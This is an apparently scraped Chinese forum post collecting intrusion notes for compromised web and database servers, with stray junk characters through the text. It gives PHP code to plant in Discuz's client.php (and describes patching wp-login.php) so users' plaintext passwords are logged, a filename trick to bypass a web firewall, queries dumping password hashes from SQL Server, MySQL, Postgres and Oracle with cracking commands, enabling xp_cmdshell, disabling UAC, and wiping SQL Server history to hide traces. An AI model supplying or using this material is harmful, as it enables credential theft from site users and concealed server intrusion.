" O: h% T4 i/ e, A当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。9 s7 V" ?6 o& f! A# D
就是搜索case ‘login’
( T: u8 L- t1 v6 ~在它下面直接插入即可,记录的密码生成在pwd.txt中,
) a+ |% X5 I8 t  y$ L) O6 E其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录/ x+ f* i) }0 Q# O: M- r
利用II6文件解析漏洞绕过安全狗代码:
& k' G& M( v( x/ w" g: F" ?% X;antian365.asp;antian365.jpg, H$ j7 f4 R5 \+ H$ f0 y
2 Z. I5 v/ o8 o% N& X
各种类型数据库抓HASH破解最高权限密码!) P9 _2 F, C4 F/ D1 i% h
1.sql server2000
2 d4 ]$ `% b0 K0 X/ ZSELECT password from master.dbo.sysxlogins where name='sa') H$ A4 ~- r4 @5 r! B! D
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
! U8 ~) i1 Z( Z% m- ?: g+ D, a5 ?2FD54D6119FFF04129A1D72E7C3194F7284A7F3A) c' ^, d$ ^9 E' Q. H
" e2 t# p! U3 W/ {9 I7 E
0×0100- constant header: X/ K& t1 O3 Y9 q4 d
34767D5C- salt7 L) B9 w* r! N/ L# [# A
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash4 c4 U+ f; T6 k- O3 F# E! M
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash% D: K& i- _2 o6 Z: R5 [4 J* ]
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
4 O* S& ?$ ~% _$ ISQL server 2005:-
) i+ a$ Z- I' V, `6 m" Y4 _SELECT password_hash FROM sys.sql_logins where name='sa'! ]$ w5 Y! X' x4 i
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
5 F9 g5 A2 G, B) Y0×0100- constant header
: i& q+ F( |) |993BF231-salt
; J  S/ C1 X6 a& w, c5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash/ p7 ]7 Q4 N4 v4 m' f
crack case sensitive hash in cain, try brute force and dictionary based attacks.
* d  X3 a7 s* S2 i) l3 X6 E
1 v% y6 `& i$ @. H+ a0 A5 G5 Qupdate:- following bernardo’s comments:-
& z( k6 a3 ]8 {7 v1 l. ~/ m8 ~use function fn_varbintohexstr() to cast password in a hex string.
% O5 M3 r6 l, t- l( L( Le.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins+ q# U- g5 P) ]$ ~5 ^' @, v* y
; F, C; P/ e1 f
MYSQL:-
$ j; g8 t5 C+ \  a# s7 a5 G6 u
$ Z( x3 ]5 k* h  ^In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
" {% H2 _+ ^' |; u9 z( T3 F/ O' z- E
*mysql  < 4.1/ p4 I. Z3 B% l. N, V1 s2 t' \: {4 p

/ X5 r' E( @* R" H" q5 i, ]8 wmysql> SELECT PASSWORD(‘mypass’);
5 x4 V7 R2 d* J* h. K# k+——————–+, @# t/ z3 c' e
| PASSWORD(‘mypass’) |2 I2 p0 v7 e! h+ ]
+——————–+. D* [9 [4 t4 L  c& m
| 6f8c114b58f2ce9e   |# ^& w* M  w/ p* q( g
+——————–+) U. g/ k& c  R
. q% \6 P# B0 \
*mysql >=4.13 b" ]- C# _0 {3 m
6 k) E+ m; g& ], H4 Y
mysql> SELECT PASSWORD(‘mypass’);( p, r$ x9 M' K  `" D6 A
+——————————————-+
# a' A; f0 ]6 F: v. u1 R2 L| PASSWORD(‘mypass’)                        |" _) w! G8 o0 i4 j9 `  Q# {
+——————————————-+
( P4 q& J2 P0 m" _0 C: @3 D| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |4 }3 g+ k  g9 |5 M7 [' Q
+——————————————-+, ?  e; f1 G; _& S8 G% o
/ M) p' g8 p" b4 ~0 n7 j* q
Select user, password from mysql.user
% U2 [8 J: w3 x2 @The hashes can be cracked in ‘cain and abel’
% T. N& a. e9 ^- J/ P7 L% q4 H! u% M' T; m
Postgres:-; n+ o' o& Z4 p
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
) u3 ?' h; G; j7 Z0 `8 V! Iselect usename, passwd from pg_shadow;
; `6 p( A" _9 }$ v& d$ \' Cusename      |  passwd. u9 l* s- ^! ?+ n6 j$ v1 `2 d% b/ y
——————+————————————-5 |" W9 x1 V0 V$ Y9 Y) K
testuser            | md5fabb6d7172aadfda4753bf0507ed43963 r& }$ m2 x% e
use mdcrack to crack these hashes:-, y: H( n7 o/ v+ ~4 W$ C  s
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43969 R9 i' _1 I  j' V" K  J! Y

7 g7 e& D' P% X8 x0 T) z2 }* \/ @Oracle:-  h. D) S3 W2 i
select name, password, spare4 from sys.user$# w; Y6 U+ o+ L" @6 ^, ~7 H; ^
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g" v- S  f; J% @' I# [& i. z5 `! K
More on Oracle later, i am a bit bored….. R. G4 A2 v! G8 q0 ]5 A9 y

7 s$ g" E, k  N( H& y8 _2 e6 [( a8 N/ {" `7 f/ b& T  f
在sql server2005/2008中开启xp_cmdshell+ k1 a+ X3 v  }6 x# z4 v' K! J
-- To allow advanced options to be changed.
- @9 f5 \; q! i' w6 K9 D5 y: i; yEXEC sp_configure 'show advanced options', 1
( \- N1 t4 |8 zGO
" Q8 |5 Z6 ^1 B' S4 H' z-- To update the currently configured value for advanced options.7 l; ~9 l% P6 G3 \+ j6 h
RECONFIGURE
) l5 ?% C6 I7 I9 W7 x0 IGO3 d% ]5 M: F& z3 Z
-- To enable the feature." z9 d! {0 K$ @; F0 Z& e: h9 O9 K6 X
EXEC sp_configure 'xp_cmdshell', 1
) M5 S! Z" r. A6 O8 EGO
4 w$ h6 M( L9 f-- To update the currently configured value for this feature.
8 d6 z. F8 P8 u' K% y7 X0 ZRECONFIGURE
* A4 Z& G# M& s1 o' vGO* m& P" H# }; C) I' i+ K  n
SQL 2008 server日志清除,在清楚前一定要备份。* J- ^! a, W* \/ u% Z
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:& Y1 S5 I( S) S4 @0 Q
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
! w6 W2 i2 N# a/ p% Z3 ~! g$ i
( K0 M) c1 ]5 Y7 s0 T- ]0 \对于SQL Server 2008以前的版本:
/ h' R% {3 }1 Y  Y$ I$ ~SQL Server 2005:' T" W6 }# d* ^! j7 J; v) X+ Q
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat# o) ]# p! D( F( A
SQL Server 2000:
' t! T' g: v, y- @6 T$ }清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
- q5 A4 M- W& M4 e, s2 F4 T# ?/ w2 W( P7 W- q7 j
本帖最后由 simeon 于 2013-1-3 09:51 编辑! t2 X* K; l% U2 c" ~# I; t

  ~; j1 ?' P. `/ X) {! H3 B) l, a; f* `- X7 h$ Y; x; w( b- a
windows 2008 文件权限修改
& b2 q0 _0 C1 Y* j8 }9 |! m- I1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx: F+ }( e% k3 K: _( {+ O- N
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
4 }% z- ^8 Z' E2 K一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
% |4 x  e* l3 G0 v% Z: r* u
% z* L; i! W# t0 @Windows Registry Editor Version 5.00
2 W, Y/ j) d1 X2 J1 i* D8 O[HKEY_CLASSES_ROOT\*\shell\runas]
& s+ s8 o0 a) U$ W# y@="管理员取得所有权"
: j% T8 v9 w' ~9 R4 T"NoWorkingDirectory"=""
& b: g# x# S; i2 {[HKEY_CLASSES_ROOT\*\shell\runas\command]
' ^8 t' Q3 D* n7 }$ {6 _: h@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
: B1 }2 T, I& m" [! l8 {1 K"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ l& z0 g! K2 ]/ k9 _4 p[HKEY_CLASSES_ROOT\exefile\shell\runas2]
/ ], `/ g% ^: N, \3 T@="管理员取得所有权"$ _# J$ D$ Z' T8 x1 H+ Y
"NoWorkingDirectory"=""6 b3 \$ a1 I+ C5 y% G& a
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
0 [- \: _) {3 ], o3 _' u. K7 _@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( g& u2 x& l; y; Z9 e- l, O3 }
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& H; N; K0 _/ U3 b

' ^9 c7 y9 r6 b- b- U/ c[HKEY_CLASSES_ROOT\Directory\shell\runas]. {( t; [+ g5 [+ }" p: P
@="管理员取得所有权"( a5 i# r8 @$ j" Z
"NoWorkingDirectory"=""
% E  e) c0 l: f[HKEY_CLASSES_ROOT\Directory\shell\runas\command]- F% g' o1 W( K8 E+ b' g
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 b& \7 X) q( B0 o& \3 d2 |"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", M1 ^! z0 }; o4 F
! f7 d9 g8 H' F

! A9 e& c  S" A4 C. n: Bwin7右键“管理员取得所有权”.reg导入
/ d+ E/ m( v- ~" _$ f; B二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,. m. x( `0 k+ F7 j8 }( l, D
1、C:\Windows这个路径的“notepad.exe”不需要替换7 b6 ]7 \; e% j5 X7 i3 ~- G. Z! R) |
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换# X$ H8 p4 L! f0 C$ N
3、四个“notepad.exe.mui”不要管  P: [0 S2 s- D& f6 V! t( g
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
' }; b4 V( j* r% s* L5 jC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”  u  j& K, ^) F8 V& m7 b8 z4 q
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,8 j" _$ P5 a; i1 P0 ~$ g
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。& x( F5 }( u! Y- S4 R
windows 2008中关闭安全策略:
8 Q1 j4 q6 |- S) V0 y4 y% yreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9 o* A4 h' c& O  ~/ p
修改uc_client目录下的client.php 在
' V- G+ |2 f. n- lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {4 o+ J: x8 s' ^
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
3 a5 n- S8 q( v  H4 u# |你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw4 r% s1 O4 l2 D/ _; i
if(getenv('HTTP_CLIENT_IP')) {
3 P0 s5 R* b9 v: n3 G$onlineip = getenv('HTTP_CLIENT_IP');
5 V' }7 Z: J# [( z% b: t} elseif(getenv('HTTP_X_FORWARDED_FOR')) {# x1 y5 P5 s9 O& h- O
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
4 z! I7 |+ z2 e1 D9 N( [" H} elseif(getenv('REMOTE_ADDR')) {
& F' Y5 O' u' q3 h$onlineip = getenv('REMOTE_ADDR');
  f& s# d2 {% p5 _  S/ {- F} else {
+ t# i. `2 L3 W! E! w3 X$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];* c& H) O4 t8 y& g; s. D1 Z) s
}. o6 e; K  v% L0 Q6 J# ?4 z
     $showtime=date("Y-m-d H:i:s");
$ @' t) b5 F5 J& U, `+ v. n1 g* ^! c6 Z    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";; N5 K' s" i  F4 U4 c
    $handle=fopen('./data/cache/csslog.php','a+');
: `* [, N/ O: S. x1 E    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表